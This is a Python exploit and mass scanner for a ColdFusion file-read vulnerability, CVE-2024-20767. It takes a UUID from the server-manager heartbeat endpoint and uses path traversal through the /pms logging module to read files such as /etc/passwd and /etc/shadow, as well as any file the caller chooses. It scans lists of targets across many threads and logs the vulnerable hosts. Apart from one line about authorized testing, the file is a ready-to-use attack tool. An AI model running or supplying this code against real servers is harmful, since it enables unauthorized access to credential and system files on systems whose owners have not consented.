1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import urllib3
import requests
import argparse
from urllib.parse import urlparse
from concurrent.futures import ThreadPoolExecutor, as_completed
urllib3.disable_warnings()
class ColdFusionExploit:
    """Checker for the ColdFusion file-read issue tracked as CVE-2024-20767.

    The flow implemented here is: request the server-manager heartbeat
    endpoint, extract a UUID from its response, then send that UUID as a
    ``uuid`` header to the ``/pms`` logging module with a relative
    ``file_name`` and report whether any content came back.

    NOTE: only run this against systems you are explicitly authorized to
    test.
    """

    # ANSI colour prefix for each status marker used by print_status.
    _COLORS = {"+": "\033[92m", "-": "\033[91m", "*": "\033[94m", "!": "\033[93m"}
    _RESET = "\033[0m"

    # Pattern used to pull the UUID out of the heartbeat response body.
    _UUID_RE = re.compile(r"<var name='uuid'><string>(.+?)</string></var>")

    def __init__(self, output_file=None, port=8500):
        """Create a checker.

        Args:
            output_file: Optional path; ``test_files`` appends one line per
                positive result to it.
            port: Port that ``normalize_url`` adds to targets given without
                one.
        """
        self.output_file = output_file
        self.port = port
        self.verbose = True
        # A single session is shared by every request made by this instance.
        self.session = requests.Session()

    def print_status(self, message, status="*"):
        """Print ``message`` prefixed by ``status`` in that status's colour.

        Unknown status markers are printed without a colour prefix.
        """
        print(f"{self._COLORS.get(status, '')}{status} {message}{self._RESET}")

    def normalize_url(self, url):
        """Return ``url`` with a scheme and a port, without trailing slashes.

        ``http://`` is prepended when no http/https scheme is present. When
        the URL carries no explicit port, ``self.port`` is inserted into the
        host part (not appended to the end of the string), so targets such
        as ``http://host/`` or ``http://host/app`` stay well-formed.

        Raises:
            ValueError: propagated from ``urlparse(...).port`` when the URL
                contains a malformed port.
        """
        if not url.startswith(('http://', 'https://')):
            url = f"http://{url}"
        parsed = urlparse(url)
        # ``is None`` rather than truthiness: an explicit ":0" is still an
        # explicit port and must not get a second one appended.
        if parsed.port is not None:
            return url.rstrip('/')
        with_port = parsed._replace(netloc=f"{parsed.netloc}:{self.port}")
        return with_port.geturl().rstrip('/')

    def get_uuid(self, url):
        """Fetch the UUID exposed by the heartbeat endpoint of ``url``.

        Returns:
            The UUID string, or ``None`` when the request fails, the status
            is not 200, or the response does not contain the expected
            ``uuid`` element.
        """
        endpoint = "/CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat"
        try:
            response = self.session.get(f"{url}{endpoint}", verify=False, timeout=10)
            if response.status_code == 200:
                match = self._UUID_RE.search(response.text)
                if match:
                    uuid = match.group(1)
                    if self.verbose:
                        # Only the first 8 characters are echoed.
                        self.print_status(f"UUID: {uuid[:8]}...", "+")
                    return uuid
        except Exception as e:
            # Best effort: a failing target must not abort a scan.
            if self.verbose:
                self.print_status(f"Error: {e}", "-")
        return None

    def read_file(self, url, uuid, file_path):
        """Request ``file_path`` through the ``/pms`` logging module.

        Args:
            url: Normalized base URL of the target.
            uuid: Value sent in the ``uuid`` request header.
            file_path: Path placed after the relative prefix in ``file_name``.

        Returns:
            The response text when the status is 200 and the body is not the
            empty list ``[]``; otherwise ``None``.
        """
        headers = {"uuid": uuid}
        endpoint = f"/pms?module=logging&file_name=../../../../../../../{file_path}&number_of_lines=100"
        try:
            response = self.session.get(f"{url}{endpoint}", verify=False, headers=headers, timeout=10)
            if response.status_code == 200 and response.text.strip() != "[]":
                return response.text
        except Exception as e:
            # Same policy as get_uuid: stay best-effort, but do not swallow
            # KeyboardInterrupt/SystemExit the way a bare ``except`` would.
            if self.verbose:
                self.print_status(f"Error: {e}", "-")
        return None

    def test_files(self, url, uuid):
        """Probe a fixed list of well-known files and stop at the first hit.

        On a hit the result is printed, a preview (first 200 characters) is
        shown in verbose mode, and one line is appended to
        ``self.output_file`` when it is set.

        Returns:
            ``True`` as soon as one file yields content, else ``False``.
        """
        files = {
            "Linux": ["etc/passwd", "etc/shadow", "etc/hosts"],
            "Windows": ["Windows/win.ini", "Windows/System32/drivers/etc/hosts", "boot.ini"],
        }
        for os_name, file_list in files.items():
            for file_path in file_list:
                content = self.read_file(url, uuid, file_path)
                if not content:
                    continue
                self.print_status(f"VULNERABLE: {url} - {os_name} - {file_path}", "+")
                if self.verbose:
                    preview = content[:200] + "..." if len(content) > 200 else content
                    print(preview)
                    print("-" * 50)
                if self.output_file:
                    with open(self.output_file, "a") as f:
                        f.write(f"{url} - {os_name} - {file_path}\n")
                return True
        return False

    def exploit_custom_file(self, url, uuid, custom_file):
        """Request one caller-chosen file and print its full content.

        Returns:
            ``True`` when content was returned, ``False`` otherwise.
        """
        content = self.read_file(url, uuid, custom_file)
        if content:
            self.print_status(f"File read: {custom_file}", "+")
            print(content)
            return True
        self.print_status(f"Failed to read: {custom_file}", "-")
        return False

    def exploit(self, url, custom_file=None):
        """Run the full check against a single target.

        Args:
            url: Target host or URL; it is passed through ``normalize_url``.
            custom_file: When given, only this file is requested; otherwise
                the built-in list in ``test_files`` is used.

        Returns:
            ``True`` when a file could be read, ``False`` otherwise
            (including when no UUID could be obtained).
        """
        url = self.normalize_url(url)
        if self.verbose:
            self.print_status(f"Testing: {url}")
        uuid = self.get_uuid(url)
        if not uuid:
            if self.verbose:
                self.print_status(f"No UUID: {url}", "-")
            return False
        if custom_file:
            return self.exploit_custom_file(url, uuid, custom_file)
        return self.test_files(url, uuid)

    def scan_file(self, target_file, threads):
        """Check every target listed in ``target_file`` using a thread pool.

        Blank lines and lines whose first non-blank character is ``#`` are
        skipped. Per-target verbose output is suppressed for the duration of
        the scan and the previous ``verbose`` setting is restored afterwards.

        Args:
            target_file: Path of a text file with one target per line.
            threads: Maximum number of worker threads.
        """
        # isfile (not exists) so that a directory path is reported instead
        # of crashing in open().
        if not os.path.isfile(target_file):
            self.print_status(f"File not found: {target_file}", "-")
            return
        with open(target_file, "r") as f:
            # Filter on the stripped line so indented comments are skipped too.
            stripped = (line.strip() for line in f)
            urls = [entry for entry in stripped if entry and not entry.startswith('#')]
        self.print_status(f"Scanning {len(urls)} targets with {threads} threads")
        previous_verbose = self.verbose
        self.verbose = False
        vulnerable = 0
        try:
            with ThreadPoolExecutor(max_workers=threads) as executor:
                futures = {executor.submit(self.exploit, url): url for url in urls}
                for future in as_completed(futures):
                    url = futures[future]
                    try:
                        if future.result():
                            vulnerable += 1
                            print(f"[+] {url}")
                        else:
                            print(f"[-] {url}")
                    except Exception as e:
                        print(f"[!] {url} - Error: {e}")
        finally:
            # Do not leave the instance permanently silenced.
            self.verbose = previous_verbose
        self.print_status(f"Scan complete: {vulnerable}/{len(urls)} vulnerable", "+")
def main():
    """Command-line entry point.

    Parses the options, prints the help text when neither a single target
    (``-u``) nor a target list (``-f``) is given, and otherwise runs either a
    single-target check or a threaded scan of the list. ``-u`` takes
    precedence when both are supplied.
    """
    cli = argparse.ArgumentParser(description="ColdFusion CVE-2024-20767 Exploit")
    cli.add_argument("-u", "--url", help="Target URL")
    cli.add_argument("-f", "--file", help="File with target URLs")
    cli.add_argument("-p", "--port", type=int, default=8500, help="Port (default: 8500)")
    cli.add_argument("-c", "--custom", help="Custom file to read")
    cli.add_argument("-o", "--output", help="Output file")
    cli.add_argument("-t", "--threads", type=int, default=20, help="Threads (default: 20)")
    cli.add_argument("-q", "--quiet", action="store_true", help="Quiet mode")
    opts = cli.parse_args()

    # Nothing to do without at least one kind of target.
    if not (opts.url or opts.file):
        cli.print_help()
        return

    runner = ColdFusionExploit(opts.output, opts.port)
    runner.verbose = not opts.quiet

    if opts.url:
        # Single-target mode; the optional custom file only applies here.
        runner.exploit(opts.url, opts.custom)
        return

    # The guard above guarantees a target list was supplied.
    runner.scan_file(opts.file, opts.threads)


if __name__ == "__main__":
    main()
|